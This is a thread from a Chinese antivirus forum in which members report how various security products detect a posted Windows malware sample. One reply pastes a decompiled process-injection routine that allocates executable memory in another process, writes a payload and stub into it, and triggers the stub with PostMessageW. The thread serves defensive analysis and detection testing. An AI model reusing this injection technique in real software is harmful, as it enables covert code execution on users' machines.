查看: 919|回复: 13
收起左侧

[病毒样本] 样本 1X

[复制链接]
莒县小哥
发表于 2024-7-25 12:45:12 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
1073328164
发表于 2024-7-25 12:56:52 | 显示全部楼层
迈克菲 miss
opentip未检测到威胁https://opentip.kaspersky.com/A3 ... /results?tab=upload
已上报
761773275
发表于 2024-7-25 13:06:15 | 显示全部楼层
ESET
  1. Win64/GenKryptik.GZVO 木馬 的一個變種
复制代码

DisaPDB
发表于 2024-7-25 13:09:30 | 显示全部楼层
本帖最后由 DisaPDB 于 2024-7-25 13:12 编辑

360 QVM202


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Shake2333
发表于 2024-7-25 13:15:13 | 显示全部楼层
瑞星防病毒扫描miss
DisaPDB
发表于 2024-7-25 13:30:07 | 显示全部楼层
Injector.
  1. if ( v24 )
  2.       {
  3.         v25 = OpenProcess(0x1FFFFFu, 0, dwProcessId);
  4.         LODWORD(dwSize) = 0;
  5.         ((void (__fastcall *)(SIZE_T *, _BYTE *, __int64))unk_1409DA3C6)(&dwSize, byte_1412AA010, 4i64);
  6.         v61 = 0i64;
  7.         v62 = 0;
  8.         v26 = VirtualAllocEx(v25, 0i64, (unsigned int)dwSize, 0x3000u, 0x40u);
  9.         v27 = (int)v26;
  10.         if ( v26 )
  11.         {
  12.           if ( WriteProcessMemory(v25, v26, &unk_1412AA014, (unsigned int)dwSize, 0i64) )
  13.           {
  14.             v28 = VirtualAllocEx(v25, 0i64, dword_1412AA000 - 4i64, 0x3000u, 0x40u);
  15.             v29 = (int)v28;
  16.             if ( v28 )
  17.             {
  18.               if ( WriteProcessMemory(v25, v28, byte_1412AA010, dword_1412AA000 - 4i64, 0i64) )
  19.               {
  20.                 v30 = VirtualAllocEx(v25, 0i64, 0x20ui64, 0x1000u, 0x40u);
  21.                 v36 = v30;
  22.                 if ( v30 )
  23.                 {
  24.                   Buffer = 686588744;
  25.                   v53 = -29368;
  26.                   v54 = 13;
  27.                   v55 = v29 - (_DWORD)v30 - 11;
  28.                   v56 = -24;
  29.                   v57 = v27 - (_DWORD)v30 - 16;
  30.                   v58 = -2092384205;
  31.                   v59 = 10436;
  32.                   v60 = -61;
  33.                   if ( WriteProcessMemory(v25, v30, &Buffer, 0x20ui64, 0i64) )
  34.                   {
  35.                     v31 = VirtualAllocEx(v25, 0i64, 8ui64, 0x3000u, 0x40u);
  36.                     v37 = v31;
  37.                     if ( v31 )
  38.                     {
  39.                       WriteProcessMemory(v25, v31, &v36, 8ui64, 0i64);
  40.                       v32 = VirtualAllocEx(v25, 0i64, 8ui64, 0x3000u, 0x40u);
  41.                       v33 = (LPARAM)v32;
  42.                       if ( v32 )
  43.                       {
  44.                         WriteProcessMemory(v25, v32, &v37, 8ui64, 0i64);
  45.                         PostMessageW(v24, 0x4ACu, 0i64, v33);
  46.                       }
  47.                     }
  48.                   }
  49.                 }
  50.               }
  51.             }
  52.           }
  53.         }
  54.       }
复制代码




inhh1
发表于 2024-7-25 13:36:57 | 显示全部楼层
bd kill
cs kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
biue
发表于 2024-7-25 14:14:13 | 显示全部楼层
腾讯电脑管家 1X

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
aikafans
发表于 2024-7-25 14:22:40 | 显示全部楼层
avast miss (已经麻了)
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-10-18 14:58 , Processed in 0.126507 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表